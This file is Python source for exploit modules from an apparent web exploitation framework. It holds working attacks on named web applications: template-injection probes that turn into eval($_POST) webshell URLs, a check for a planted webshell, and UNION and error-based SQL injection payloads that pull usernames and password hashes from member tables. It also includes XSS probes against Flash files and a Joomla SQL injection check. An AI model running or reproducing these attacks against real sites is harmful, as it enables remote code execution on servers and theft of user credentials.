def exploit(options):
    """Probe for template-expression injection and return a webshell URL.

    Appends ``${@phpinfo()}`` as a trailing path segment and looks for the
    phpinfo() page title in the reply.  On a hit the probe expression is
    swapped for ``@print(eval($_POST[chu]))`` and that URL is returned;
    otherwise the function falls through and returns None.

    NOTE: the returned URL is a live code-execution primitive — anyone who
    learns it can run PHP on the target via the ``chu`` POST parameter, so
    treat it like a credential.
    """
    target = options['target']['current_value']
    # "aciton" is part of the original probe path and is left as-is.
    probe_url = target + "/index.php/module/aciton/param1/${@phpinfo()}"
    logger.process("Requesting target site")
    response = http.get(probe_url)
    if "<title>phpinfo()</title>" not in response.text:
        return None
    logger.success("Exploitable!")
    logger.success("Phpinfo: %s" % probe_url)
    shell_url = probe_url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
    logger.success("Webshell: %s" % shell_url)
    return shell_url
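def exploit(options):
    """Run verify() against the configured target and report the credentials.

    Returns ``"<url>: <username>|<password>"`` when verify() yields an
    indexable pair, or None on any failure.  The original wrapped the whole
    body in a bare ``except: pass``, which hid network errors, parse errors
    and even KeyboardInterrupt; failures are now logged and only ``Exception``
    subclasses are caught.
    """
    logger.process("Requesting target site")
    # Read the configured target URL.
    url = options["target"]["current_value"]
    try:
        result = verify(url)
        # verify() may return None/False on a miss — indexing is kept inside
        # the try so that case is reported instead of crashing.
        username, password = result[0], result[1]
    except Exception as exc:
        logger.error("Exploit failed: %s" % exc)
        return None
    logger.success("Username: %s" % username)
    logger.success("password: %s" % password)
    return "%s: %s|%s" % (url, username, password)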
def exploit(options):
    """Fingerprint the XSS-prone ``flvplayer.swf`` and return its probe URL.

    Fetches the SWF with a ``link=javascript:alert(1);`` query string and
    compares the MD5 of the response body against the known hash of the
    vulnerable file.  Returns the probe URL on a match, otherwise None.
    The hash identifies the file version only — nothing is executed here.
    """
    base = options['target']['current_value']
    probe_url = (base + "/static/image/common/flvplayer.swf?file=1.flv&"
                 "linkfromdisplay=true&link=javascript:alert(1);")
    logger.process("Requesting target site")
    # Trailing positional argument looks like a timeout — confirm against http.get().
    response = http.get(probe_url, 5)
    digest = hashlib.md5(response.content).hexdigest()
    if digest != "7d675405ff7c94fa899784b7ccae68d3":
        return None
    logger.success("Exploitable!")
    logger.success(probe_url)
    return probe_url
def exploit(options):
    """Fingerprint the XSS-prone KindEditor ``swfupload.swf`` and return its URL.

    Requests the SWF with a ``movieName`` value that breaks out of the
    embedded script and compares the MD5 of the body against the known hash
    of the vulnerable file.  Returns the probe URL on a match, otherwise None.
    Only the file version is checked; the payload is not evaluated here.
    """
    base = options['target']['current_value']
    probe_url = (base + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf"
                 "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale"
                 "rt%281%29;//")
    logger.process("Requesting target site")
    response = http.get(probe_url)
    digest = hashlib.md5(response.content).hexdigest()
    if digest != "3a1c6cc728dddc258091a601f28a9c12":
        return None
    logger.success("Exploitable!")
    logger.success(probe_url)
    return probe_url
def exploit(options):
    """Send the module-level ``payload`` to the target and validate the reply.

    ``payload`` and ``valiator`` must be defined elsewhere in the module (the
    latter's name is kept as spelled there).  Returns True when
    ``valiator(response.text) == True``, False otherwise.
    """
    # Build the request URL by plain concatenation — payload presumably
    # carries its own leading '/'; confirm against the module definition.
    target_url = options["target"]["current_value"] + payload
    logger.process("send request...")
    response = http.get(target_url)
    # Equality with True is kept deliberately: a non-bool truthy result
    # (e.g. a match object) is treated as a miss, as in the original.
    hit = valiator(response.text) == True
    if not hit:
        logger.error("exploit fail, target site no xss ! :(")
        return False
    logger.success("exploit success, target site have xss vuln ! :)")
    return True
def verify(url):
    """Probe the ``gids[]`` POST parameter for error-based SQL injection.

    Posts a ``floor(rand(0)*2)`` / ``group by`` duplicate-key payload and
    treats the string "MySQL Query Error" in the reply as confirmation.
    Returns True on that marker; otherwise falls through and returns None.
    """
    logger.process("Requesting target site")
    injection = (") and (select 1 from (select count(*"
                 "),concat(version(),floor(rand(0)*2))"
                 "x from information_schema.tables gro"
                 "up by x)a)#")
    data = {"gids[99]": "'", "gids[100][0]": injection}
    response = http.post(url, data)
    if "MySQL Query Error" not in response.text:
        return None
    logger.success("Exploitable!")
    return True
def verify(url):
    """Confirm a webshell at ``<url>/data/config.inc.php``.

    POSTs the raw body ``c=phpinfo()`` and looks for "phpinfo" anywhere in
    the reply.  Returns ``{'shell': url, 'passwd': 'c'}`` on success and
    False otherwise.

    NOTE(review): the body is passed as a string, not a dict, so http.post()
    must accept a pre-encoded body — confirm against the helper.  Matching the
    bare substring "phpinfo" can also false-positive on a page that echoes
    the request back.
    """
    logger.process("Verify webshell...")
    shell_url = url + '/data/config.inc.php'
    # Body shaped for the shell's expected parameter name.
    body = 'c=phpinfo()'
    response = http.post(shell_url, body)
    if "phpinfo" not in response.text:
        logger.error('Exploit fail :(')
        return False
    logger.success("Exploit success :)")
    return {'shell': shell_url, 'passwd': 'c'}
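def exploit(options):
    """Extract one ``et_users`` username/hash via a UNION SELECT in ``keyword``.

    The injected row is wrapped in the marker ``handsomechu``
    (``0x68616e64736f6d65636875``) with ``~~~`` between username and
    password.  Returns ``"<url>: <username>|<hash>"`` on success; returns
    None when the marker is absent or the extracted fragment does not split
    into exactly two fields (the original raised ValueError in that case).
    """
    target = options['target']['current_value']
    logger.process("Requesting " + target)
    url = target + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
        "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
        "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    header = {'Cookie': options['cookie']['current_value']}
    # Trailing positional argument appears to be a timeout — confirm against http.get().
    response = http.get(url, header, 5)
    if "handsomechu" not in response.text:
        return None
    logger.success("Exploitable!")
    fields = response.text.split("handsomechu")[1].split("~~~")
    if len(fields) != 2:
        # A username containing "~~~" or a mangled page would break the unpack.
        logger.error("Unexpected response layout: %r" % fields)
        return None
    username, password = fields
    logger.success("Username: %s" % username)
    logger.success("Hash: %s" % password)
    return "%s: %s|%s" % (url, username, password)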
def exploit(options):
    """Try two search endpoints for ``${@phpinfo()}`` template injection.

    Each candidate URL carries the URL-encoded probe; the first reply that
    contains the phpinfo() title is turned into a webshell URL
    (``${@eval($_POST['chu'])}``, URL-encoded) and returned.  Returns None
    when neither candidate hits.

    NOTE: the returned URL is a live code-execution primitive on the target;
    handle it like a credential.
    """
    base = options['target']['current_value']
    probe = "%24%7B%40phpinfo%28%29%7D"
    candidates = [
        base + "/index.php/search.html?keyword=" + probe,
        base + "/search.html?keyword=" + probe,
    ]
    for index, candidate in enumerate(candidates, 1):
        logger.process("Testing URL %d..." % index)
        response = http.get(candidate)
        if "<title>phpinfo()</title>" not in response.text:
            continue
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % candidate)
        shell_url = candidate.replace(probe, "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
        logger.success("WebShell: %s" % shell_url)
        return shell_url
    return None
def get_hash(url):
    """Pull the first ``cdb_members`` username and password hash.

    Uses the same ``floor(rand(0)*2)`` duplicate-key error technique as the
    sibling verify(); the row comes back wrapped in ``~~~`` with a single
    ``~`` between username and hash.  Returns ``{"username": ..., "md5": ...}``.
    No exploitability check is done here — if the markers are missing from
    the reply an IndexError propagates to the caller.
    """
    logger.process("Getting manager's hash")
    injection = (
        ") and (select 1 from (select count(*"
        "),concat((select (select (select con"
        "cat(0x7e7e7e,username,0x7e,password,"
        "0x7e7e7e) from cdb_members limit 0,1"
        ") ) from `information_schema`.tables"
        " limit 0,1),floor(rand(0)*2))x from "
        "information_schema.tables group by x"
        ")a)#"
    )
    data = {"gids[99]": "'", "gids[100][0]": injection}
    response = http.post(url, data)
    wrapped = response.text.split("~~~")[1]
    parts = wrapped.split("~")
    return {"username": parts[0], "md5": parts[1]}
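def exploit(options):
    """Extract an ``et_users`` username/hash via a UNION SELECT in ``uid``.

    The injected row is wrapped in the marker ``handsomechu``
    (``0x68616e64736f6d65636875``) with ``~~~`` between username and
    password; ``limit 1,1`` selects the second row.  Returns
    ``"<url>: <username>|<hash>"`` on success; returns None when the marker
    is absent or the fragment does not split into exactly two fields (the
    original raised ValueError there).
    """
    target = options['target']['current_value']
    logger.process("Requesting " + target)
    url = target + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
        "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
        "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    # Session cookie from the configured options.
    header = {'Cookie': options['cookie']['current_value']}
    # Trailing positional argument appears to be a timeout — confirm against http.get().
    response = http.get(url, header, 5)
    if "handsomechu" not in response.text:
        return None
    logger.success("Exploitable!")
    fields = response.text.split("handsomechu")[1].split("~~~")
    if len(fields) != 2:
        # A username containing "~~~" or a mangled page would break the unpack.
        logger.error("Unexpected response layout: %r" % fields)
        return None
    username, password = fields
    logger.success("Username: %s" % username)
    logger.success("Hash: %s" % password)
    return "%s: %s|%s" % (url, username, password)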
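def exploit(options):
    """Send one GET with the ``xxoo`` header and look for "success" in the body.

    Returns True when the response body contains "success", False otherwise.
    The original tested ``"success" in response`` against the response
    object rather than its body; every sibling exploit reads
    ``response.text``, so that is what is checked here.
    """
    # Log progress.
    logger.process("set exploit params...")
    # Read the configured target URL.
    url = options["target"]["current_value"]
    logger.process("send request...")
    # Request header for this check — the value looks like a placeholder; confirm.
    headers = {'xxoo': '1111111111111111'}
    # Trailing positional argument appears to be a timeout — confirm against http.get().
    response = http.get(url, headers, 1)
    if "success" in response.text:
        logger.success("exploit success ! :)")
        return True
    logger.error("exploit fail ! :(")
    return False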
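def exploit(options):
    """Probe Joomla ``com_fields`` ``list[fullordering]`` for error-based SQLi.

    Injects ``updatexml(0x5e,concat(1,(select md5(1))),1)`` and looks for
    the digest MySQL computes for ``md5(1)`` in the reply.  Returns True on
    a hit, False otherwise.

    Fixes relative to the original:
    * the request is sent to ``payload`` — the original fetched the bare
      target URL, so the injection never reached the server;
    * ``hashlib.md5(1)`` raised TypeError; the digest is now computed over
      ``b"1"``, which is what MySQL hashes for ``md5(1)``;
    * the digest is searched in ``response.text`` instead of the response object.

    NOTE(review): ``payload`` is concatenated without a leading '/', unlike the
    sibling exploits — confirm the configured target ends with one.
    NOTE(review): MySQL truncates XPATH-error output to 32 characters, so the
    leading ``1`` from concat() may push the last hex digit out of the
    message; confirm the full-digest match against a known-vulnerable instance.
    """
    logger.process("set exploit params...")
    # Read the configured target URL.
    url = options["target"]["current_value"]
    payload = url + 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x5e,concat(1,(select md5(1))),1)'
    logger.process("send request...")
    response = http.get(payload)
    expected = hashlib.md5(b"1").hexdigest()
    if expected in response.text:
        logger.success("exploit success ! :)")
        return True
    logger.error("exploit fail ! :(")
    return False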
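def do_exploit(self, line):
    """Console command handler: run the currently selected exploit.

    ``line`` is the remainder of the command line and is accepted but unused.
    Returns None when no exploit is selected; otherwise returns whatever
    ``self.run_exploit()`` returns.  The progress message's "Exloit" typo is
    corrected.
    """
    if not self.current_exploit:
        return None
    logger.process("Exploit init...")
    return self.run_exploit()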